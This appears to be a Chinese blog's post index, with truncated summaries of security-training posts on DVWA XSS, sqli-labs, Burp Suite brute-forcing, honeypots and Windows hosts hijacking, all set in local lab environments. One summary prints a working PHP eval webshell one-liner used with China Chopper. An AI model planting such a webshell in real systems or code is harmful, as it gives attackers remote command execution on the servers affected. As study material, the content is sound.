云烟三渺

摘要： 实战 1 反射型XSS low <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // F 阅读全文

摘要： XSS攻击 什么是xss攻击 XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的H 阅读全文

摘要： 中国菜刀演练环境搭建 需要的工具： phpstudy 一句话木马php脚本 <?php @eval($_POST['test']);?> 菜刀程序 1. 新建一个一句话php木马程序 muma.php，模拟攻击者，将之放入phpstudy的网站根目录 2. 模拟被攻击者启动phpstudy 3. 攻 阅读全文

摘要： sqli_lab靶场搭建 mac环境搭建 需要的环境：docker 715 docker search sqli-labs //搜索镜像 718 docker pull acgpiano/sqli-labs //拉取镜像 719 docker images //查看镜像列表 720 docker r 阅读全文

摘要： 来做点有趣的事情吧～登录爆破～ 我来想想这个怎么编排～用之前搭建的蜜罐来做演示吧，来熟悉burpsuite的一些基础功能 第一步： 开启代理后，打开burpsuite打开蜜罐诱导页面：（其他登录页面也可以代替，请不要恶意攻击别人家服务器，警察叔叔会找你的） 然后burpsuite页面的【target 阅读全文

摘要： 什么是burpsuite 百度百科解释：Burp Suite 是用于攻击web 应用程序的集成平台，包含了许多工具。Burp Suite为这些工具设计了许多接口，以加快攻击应用程序的过程。所有工具都共享一个请求，并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。 burpsuite官网： 阅读全文

摘要： 什么是蜜罐 蜜罐技术本质上是一种对攻击方进行欺骗的技术，通过布置一些作为诱饵的主机、网络服务或者信息，诱使攻击方对它们实施攻击，从而可以对攻击行为进行捕获和分析，了解攻击方所使用的工具与方法，推测攻击意图和动机，能够让防御方清晰地了解他们所面对的安全威胁，并通过技术和管理手段来增强实际系统的安全防护 阅读全文

摘要： 学安全测试，windows系统应该了解的 主要分享 hosts劫持 常见端口号 获取Windows 密码 hosts劫持 什么是hosts Hosts是一个没有扩展名的系统文件，可以用记事本等工具打开，其作用就是将一些常用的网址域名与其对应的IP地址建立一个关联“数据库”，当用户在浏览器中输入一个需 阅读全文

摘要： 安全测试笔记之一 环境篇 以下是我的原生环境 macOS Big Sur 16G+512G 环境准备 虚拟机(Big Sur使用PD16正版，其他Mac版本VM,PD随意，毕竟省钱...) Windows7或者Windows10 iso镜像（msdn下载即可） phpstudy Dvwa ChkDl 阅读全文

摘要： 此安装过程针对Python3 MacOS 1、安装pip ，pip是Python的包管理工具,用于安装Python包。pip是“Pip Installs Packages”的递归缩写. python3 m pip install U pip 2、Python虚拟环境。它把软件所需的全部依赖和环境变量 阅读全文